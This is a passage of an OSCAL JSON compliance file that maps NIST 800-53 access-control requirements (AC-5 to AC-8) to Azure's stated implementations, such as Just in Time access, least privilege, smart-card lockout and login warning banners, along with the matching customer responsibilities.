The backend is not directly accessible, from an application data flow perspective, in any other method."}],"responsibilities":[{"uuid":"ee395bc7-0182-48f3-8a58-31c31f12cec6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-039"}],"description":"The customer is responsible for separating information flows within customer-deployed resources.","provided-uuid":"72d3e905-efb7-45bf-811e-974c1a68105c"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"cd4932a5-aa88-411f-8ce7-bfdb1999e427","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-5","statements":[{"uuid":"52a98c5a-9ea1-46fa-9508-91afea0a93ff","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-040"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-5_smt.a","by-components":[{"uuid":"0be4ce14-7366-4438-980a-4987f82e0687","export":{"provided":[{"uuid":"ef63e923-8a96-40b1-9443-bcb6fd9ba2da","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-040"}],"description":"Azure implements separation of duties and least privilege by assigning service team members the permissions to their service team with additional permissions being granted only if necessary for business reasons. Separation of duties within service teams is based on user access functions and is divided among different roles in an appropriate way, with the use of RBAC in Active Directory. 
Role separation ensures that operations system administrators cannot modify application code and nonessential personnel are restricted from administrative privileges in the production environment.\n\nAzure users are assigned to security roles, which have a defined list of available permissions. By default, no accounts have active permissions to the production environment. If an Azure user needs access to the production environment to perform a specific action, they request temporary Just in Time (JIT) access through the JIT portal. Approval is granted either automatically using preconfigured rules, or a different Azure user with the access approver role reviews and approves or denies the type of access requested. Access is only provided for a finite time based on the expected duration of the work to be performed. If access is approved, the user is assigned the minimum permissions required to perform the work, and permission is automatically revoked at the end of the specified time. Implementing access control using JIT access via the JIT portal effectively prevents malevolent activity without collusion, as an individual must review and approve the requestor's access request and deny requests that violate separation of duties requirements. Regardless of JIT access, reviews of accounts and all approved access occur quarterly through the Quarterly Access Review (QAR).\n\nEmergency access accounts have persistent administrative access, but generate Severity 2 incident tickets when accessed, ensuring that separation of duties is maintained due to the requirement to investigate each use. Exceptions to the JIT and emergency access account procedures are required to be approved prior to being created and utilized on the production network. 
This small number of accounts has persistent administrative access to the production environment but must follow all account management requirements before being approved and is monitored closely.\n\nAzure also establishes separation of duties on critical functions within the Azure production environment to minimize the risk of unauthorized changes to production systems. This is accomplished by separating the responsibilities for requesting, approving, and deploying changes to authorized Azure teams and personnel. Development and testing responsibilities for new software builds or changes to existing software are separated and managed through restricted access to branches within Git and segregated in the development and production environments. Features and changes are developed by the Azure service teams and are reviewed and tested by designated service team members for quality assurance and compatibility with the rest of the platform."}],"responsibilities":[{"uuid":"cb96f91f-8a07-406b-90fd-c6b97d86ab04","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-040"}],"description":"The customer is responsible for the separation of duties across customer-controlled accounts.","provided-uuid":"ef63e923-8a96-40b1-9443-bcb6fd9ba2da"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"99edf9d3-50a1-4d72-a8c6-ddc40917c4bd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-041"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-5_smt.b","by-components":[{"uuid":"f30dca04-8d4a-4cf3-8b0b-b783c2d6c666","export":{"provided":[{"uuid":"54804ab6-fa16-435d-bc0b-029b966e7817","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-041"}],"description":"Azure documents separation of duties in the Azure Access Control SOP, the Azure Software Change and Release Management SOP, and the Azure Hardware Change and Release Management SOP. Separation of duties is also enforced and documented via standard account approvals, JIT approvals, emergency access account incident tickets, and exception requests."}],"responsibilities":[{"uuid":"42ea6343-3f89-468f-a3c4-2edcf8a5f192","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-041"}],"description":"The customer is responsible for documenting the separation of duties across customer-controlled accounts.","provided-uuid":"54804ab6-fa16-435d-bc0b-029b966e7817"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"aaf4cf4e-3db9-42b5-9557-c19ff170bcff","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-6","statements":[{"uuid":"b2f0fbd5-5b57-4d15-9742-8df50426f629","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-042"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-6_smt","by-components":[{"uuid":"0efeae4d-d478-443c-aaf9-54384d92b3c7","export":{"provided":[{"uuid":"69f1baf7-f09d-4bbb-b201-43c32333d952","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-042"}],"description":"Privileges to Azure production systems and administrative interfaces are assigned to Azure personnel based on least privilege principles in accordance with job responsibilities. Elevated access must be approved by the respective account managers.\n\nOneIdentity and MyAccess, used for access provisioning to resources, are based on structured business resources/rules created by the Azure service teams. They are used to grant Azure personnel access to designated and restricted security groups on least privilege principles. Service teams can obtain Just in Time (JIT) access for troubleshooting purposes. JIT access is provided through the JIT portal based on the workflow configured, and the access is granted only to the requested assets. The access can be configured to support business needs, can range from one (1) hour to seven (7) days, and is revoked based on the JIT policy settings prescribed by the resource owner. 
Emergency access accounts are provided the minimum permissions necessary to execute work if JIT is nonfunctioning.\n\nAccess to Azure systems is granted based upon need-to-know and least-privilege principles. Access that has not been explicitly permitted is denied by default. Role-based access controls are used to allocate logical access to a specific job function or area of responsibility, rather than to an individual."}],"responsibilities":[{"uuid":"af64e2e5-7b57-4483-884d-3d81128d0301","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-042"}],"description":"The customer is responsible for enforcing least privilege across customer-controlled accounts.","provided-uuid":"69f1baf7-f09d-4bbb-b201-43c32333d952"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"2d904b07-ff0f-4431-92e2-e02bf3a45330","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-6.1","statements":[{"uuid":"e1839a48-e4a8-44a9-b8bc-0441770a8715","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-043"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-6.1_smt","by-components":[{"uuid":"101535c6-5729-4693-8ad9-0f14ac2c2f0b","export":{"provided":[{"uuid":"e1cc1e02-a1b5-45f4-9170-f431585aa3e0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-043"}],"description":"For all Azure assets, logical access is explicitly authorized. 
Azure requires explicit authorization before granting access to Azure, including but not limited to any of the following security functions: establishing system accounts; configuring access authorizations; authentication; setting events to be audited; and system and security administration access to log data. OneIdentity and MyAccess are used to document authorization to Azure resources based on structured business rules using designated and restricted security groups that prescribe which Azure components a user can access."}],"responsibilities":[{"uuid":"09691e6c-fc99-44a6-980a-b1950795a89c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-043"}],"description":"The customer is responsible for authorizing access to security functions for customer-controlled accounts.","provided-uuid":"e1cc1e02-a1b5-45f4-9170-f431585aa3e0"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"ae8d51cd-b019-4065-828e-c26228ae9ea4","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-6.2","statements":[{"uuid":"bc70a8bf-8325-44ad-b47b-0f182544c457","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-044"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-6.2_smt","by-components":[{"uuid":"8cb3a4bc-757f-43c5-b981-49faed446a8b","export":{"provided":[{"uuid":"1255af29-d960-43c6-846d-3439713ddcf1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-044"}],"description"
:"Azure personnel do not have persistent elevated access by default to the Azure production environment. Azure requires users to use their accounts for specific job functions that require the appropriate level of access needed. Elevated access is used only for those specified job functions required by the user's responsibilities; temporary elevated access is granted through JIT based on a valid business justification. Persistent elevated access in the form of emergency access accounts is not permitted to be used except for management and operation of the system. In addition, no unprivileged actions such as use of web browsers, email clients, etc., are allowed within the production environment."}],"responsibilities":[{"uuid":"3ed7e8f4-7375-4baa-9939-3c0be1ea53cf","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-044"}],"description":"The customer is responsible for requiring the use of non-privileged accounts/roles when accessing non-security functions for customer-deployed resources.","provided-uuid":"1255af29-d960-43c6-846d-3439713ddcf1"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"cd0f297a-526c-423c-8ec7-4e3cd54672b5","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-6.3","statements":[{"uuid":"d1050dc4-b079-4c97-b085-0e5cb95ff96e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-045"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-6.3_smt","by-components":[{"uuid":"80f9d64a-841e-4a5d-911c-d3572237bd0e","export":{"provided":[{"uuid":"4d470c51-2233-4a59-ac38-4c95e0903b16","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-045"}],"description":"Azure establishes conditions for system account group membership using Active Directory. All group membership for Azure systems must be approved by the respective security group owner. Users are not granted membership to account groups for which they do not require access. 
Following the least privilege principle, group membership is given with the minimum access needed by the authorized individual to perform his or her job function and role.\n\nElevated commands can only be executed by administrative accounts, which are either JIT or emergency access accounts that must be authorized and approved prior to or upon use, or exception accounts that must be formally approved to maintain persistent administrative access."}],"responsibilities":[{"uuid":"dd6c90b0-5c57-4f03-9fff-c243566b0c93","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-045"}],"description":"The customer is responsible for enforcing least privilege when authorizing network access to privileged commands for customer-deployed resources; the rationale for such authorizations should be documented in the system security plan (SSP).","provided-uuid":"4d470c51-2233-4a59-ac38-4c95e0903b16"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"b238947b-226b-4cbf-b635-fec887c5bd02","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-6.5","statements":[{"uuid":"80f1b443-9de0-4fd2-8807-d5464d16d3a4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-046"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-6.5_smt","by-components":[{"uuid":"bfa8004a-df65-4656-b880-8833c0d7d0bd","export":{"provided":[{"uuid":"f3e9795d-b774-46b6-836f-8e657c5ac08b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-046"}],"description":"Azure restricts elevated access via the OneIdentity groups to which a user belongs. 
These groups determine which assets the user is able to reach via elevated access."}],"responsibilities":[{"uuid":"85d17628-b9e3-46db-9d84-e85835fc8dc2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-046"}],"description":"The customer is responsible for restricting privileged customer-controlled accounts.","provided-uuid":"f3e9795d-b774-46b6-836f-8e657c5ac08b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"ac305964-868e-42a2-96a9-effdd2adcf94","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-6.7","statements":[{"uuid":"0dd4c515-315e-4cde-9677-9c0a597191f1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-047"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-6.7_smt.a","by-components":[{"uuid":"0677fdb3-51f4-45c3-b737-c63c233cf25a","export":{"provided":[{"uuid":"1ac20e02-c1d2-41e5-b385-07b7dded1185","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-047"}],"description":"Azure Security generates reports containing user privilege assignments to each service team at least quarterly. 
Service teams use this report to review user privileges for the various users and roles administering the service and validate the need for the assigned privileges."}],"responsibilities":[{"uuid":"d683ea66-e2ed-44b1-8d4d-3caad3fb07de","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-047"}],"description":"The customer is responsible for reviewing user privileges of customer-controlled accounts.","provided-uuid":"1ac20e02-c1d2-41e5-b385-07b7dded1185"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"11336932-b9bc-4cf4-94ab-cbec38d0c1cb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-048"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-6.7_smt.b","by-components":[{"uuid":"19bc0ec8-4a7b-4fbc-a21c-c901f29d8714","export":{"provided":[{"uuid":"25d7e9ef-35aa-416c-91f2-e623f27ecbcb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-048"}],"description":"Any user who is no longer in a role that requires access is removed as part of the review process, either by the manager identifying the access as not required or due to lack of response from the manager."}],"responsibilities":[{"uuid":"7b1e3d90-0813-4142-83f3-c7f5fd26f1ae","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-048"}],"description":"The customer is responsible for reassigning or removing privileges for customer-controlled accounts when appropriate.","provided-uuid":"25d7e9ef-35aa-416c-91f2-e623f27ecbcb"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"6aa17696-6922-4569-9e90-36c74c1647b4","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-6.8","statements":[{"uuid":"4ec5a6b9-1a1b-4182-8cc2-ea81e2ee2fea","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-049"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-6.8_smt","by-components":[{"uuid":"7ccce094-7c84-4a0a-a0d0-53c766901c4c","export":{"provided":[{"uuid":"de355561-6db0-418a-a397-7cc89508d398","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-049"}],"description":"Software execution at a higher privilege level than users executing the software is not possible for servers and network devices. Azure only permits administrator access to servers, and those administrators by default have code execution privileges. 
These users have full access to the system, preventing users from being indirectly provided greater privileges than assigned by Microsoft."}],"responsibilities":[{"uuid":"b8969591-bed8-4191-a907-744fc23d0bf3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-049"}],"description":"The customer is responsible for enforcing software execution privileges on customer-deployed resources.","provided-uuid":"de355561-6db0-418a-a397-7cc89508d398"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"28749cf2-2d68-4210-9455-5fb22a4c4723","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-6.9","statements":[{"uuid":"b5be53a2-6c4d-4249-a240-1091678ebfb6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-050"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-6.9_smt","by-components":[{"uuid":"c1903093-4a63-4ff5-a843-7488ed28e12b","export":{"provided":[{"uuid":"03728e1f-2869-4122-86d9-47716f3dd08e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-050"}],"description":"Azure captures the execution of privileged functions that are useful in monitoring and investigation of elevated access. 
These logs are evaluated by the service teams and/or the Security Response Team, which require their inclusion as data for analysis."}],"responsibilities":[{"uuid":"ce296dc8-25bf-47bf-aff5-9ba103354ae0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-050"}],"description":"The customer is responsible for auditing the execution of privileged functions on customer-deployed resources.","provided-uuid":"03728e1f-2869-4122-86d9-47716f3dd08e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"b42e4519-b0ee-447b-82e9-d7285b03bb86","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-6.10","statements":[{"uuid":"503d849e-9cf9-4163-99b7-4bfd0330f93e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-051"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-6.10_smt","by-components":[{"uuid":"b6e3b1c4-0ad6-4095-9357-ffd487c0cdf8","export":{"provided":[{"uuid":"49f937f7-1dc4-436d-ba0c-8294d8cdf44b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-051"}],"description":"Azure prevents non-privileged users from accessing elevated functions. Non-privileged service team users are never granted access to Azure. 
Customers do not have access to any functionality related to Azure safeguards/countermeasures."}],"responsibilities":[{"uuid":"1acad121-5677-46ea-a8a8-021bb1e4055a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-051"}],"description":"The customer is responsible for ensuring that non-privileged users cannot execute privileged functions on customer-deployed resources.","provided-uuid":"49f937f7-1dc4-436d-ba0c-8294d8cdf44b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"63277181-b544-4f98-8cc0-52a62aeaa02f","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-7","statements":[{"uuid":"cebbe89a-f749-4634-a910-0f02a7182b07","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-052"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-7_smt.a","by-components":[{"uuid":"a049a3a2-43be-453d-a120-9cfeae65711a","export":{"provided":[{"uuid":"ebd7d944-7df1-4f01-a29f-5e5a1c4ece16","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-052"}],"description":"For all access to the environment, Azure personnel must use multifactor authentication using a smart card and PIN. Smart card authentication enforces lockout after five (5) failed login attempts. After five (5) invalid access attempts within fifteen (15) minutes, a user's smart card is locked out until it is unblocked by an administrator. 
The smart card is tied to the user's Microsoft Entra ID (formerly AAD) account, using the CorpNet-alias-derived unique identifier for the environment, which is used for access throughout Azure via single sign-on. Local account settings inherit the smart card settings, ensuring that after five invalid PIN entries the user's smart card is locked, rather than any accounts they may be logging into, so that their access remains locked until their smart card is unlocked by an administrator."}],"responsibilities":[{"uuid":"4b7deb11-c7f2-4798-a08d-914310ecf035","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-052"}],"description":"The customer is responsible for enforcing a limit of consecutive failed login attempts on customer-deployed resources.","provided-uuid":"ebd7d944-7df1-4f01-a29f-5e5a1c4ece16"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"854eae55-873c-4ad3-8d6e-d3bf4e075b1e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-053"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-7_smt.b","by-components":[{"uuid":"1c75fac5-1c7b-4c73-be89-e947bb63452d","export":{"provided":[{"uuid":"001fd218-4263-47ff-9821-4d2a1db71e62","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-053"}],"description":"For all access to the environment, Azure personnel must use multifactor authentication using a smart card and PIN. 
Once a user's smart card is locked out after five (5) invalid access attempts against the smart card, the user must contact an administrator through the help desk to manually unblock and reset the PIN."}],"responsibilities":[{"uuid":"b7ddacd6-5a54-4095-a0bd-6794c3ff291c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-053"}],"description":"The customer is responsible for taking action when a user has reached the number of failed login attempts within the time period documented in AC-07 Part a.","provided-uuid":"001fd218-4263-47ff-9821-4d2a1db71e62"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"6560a443-c1ee-48fe-9061-41e34ba31121","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-8","statements":[{"uuid":"2cf257bb-89d1-4f6a-bb7e-a81b18f345cf","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-054"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-8_smt.a","by-components":[{"uuid":"5b651ac2-ab88-4732-b0bf-863cbcd90f6c","export":{"provided":[{"uuid":"44ed23ad-1ed4-4ca8-8bb7-628bdad163b5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-054"}],"description":"All access methods into the Azure production environment include a warning banner prior to administrative login to all servers and network devices. There are two approved messages reviewed by Microsoft Corporate, External, and Legal Affairs (CELA). 
The first states:\n\n\"You are accessing an information system that may contain U.S. Government data. System usage may be monitored, recorded, and subject to audit. Unauthorized use of the system is prohibited and may be subject to criminal and civil penalties. Use of the system indicates consent to monitoring and recording. Administrative personnel remotely accessing the Azure environment:\n\n* Maintain their remote computer in a secure manner, in accordance with organizational security policies and procedures as defined in Microsoft Remote Connectivity Security Policies.\n* Only access the Azure environment in execution of operational, deployment, and support responsibilities using only administrative applications or tools directly related to performing these responsibilities.\n* Are advised to not knowingly store, transfer into, or process in the Azure environment data exceeding a FIPS 199 High security categorization (FISMA Controlled Unclassified Information).\"\n\nAn alternate approved wording states:\n\n\"You are accessing an information system that may contain U.S. Government data. System usage may be monitored, recorded, and subject to audit. Unauthorized use of the system is prohibited and may be subject to criminal and civil penalties. Use of the system indicates consent to monitoring and recording. 
Administrative personnel remotely accessing the Azure environment:\n\n(1) shall maintain their remote computer in a secure manner, in accordance with organizational security policies and procedures as defined in Microsoft Remote Connectivity Security Policies;\n\n(2) shall only access the Azure environment in execution of operational, deployment, and support responsibilities using only administrative applications or tools directly related to performing these responsibilities; and\n\n(3) shall not knowingly store, transfer into, or process in the Azure environment data exceeding a FIPS 199 Moderate security categorization (FISMA Controlled Unclassified Information).\"\n\nA warning message is also presented to users requesting JIT elevation at the JIT access portal, prior to obtaining elevated permissions. This message states:\n\nWarning\n\nYou are accessing an information system that may contain sensitive data. System usage may be monitored, recorded, and subject to audit. Unauthorized use of the system is prohibited and may be subject to criminal and civil penalties. Use of the system indicates consent to monitoring and recording. 
Administrative personnel remotely accessing the Azure environment shall maintain their remote computer in a secure manner in accordance with organizational security policies and procedures as defined in the Microsoft Remote Connectivity Security Policies."}],"responsibilities":[{"uuid":"03493253-a086-4ca8-a3a2-425723ef8b5f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-054"}],"description":"The customer is responsible for implementing a compliant system use notification for all customer-deployed resources.","provided-uuid":"44ed23ad-1ed4-4ca8-8bb7-628bdad163b5"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"cfeccec6-56fe-408c-a613-725dfba9b0f2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-055"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-8_smt.b","by-components":[{"uuid":"7c4993f2-fb67-49db-bc7d-21d02d076622","export":{"provided":[{"uuid":"70a83291-8d75-4f30-98c1-4175601e1911","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-055"}],"description":"The warning banner is displayed during the logon sequence. 
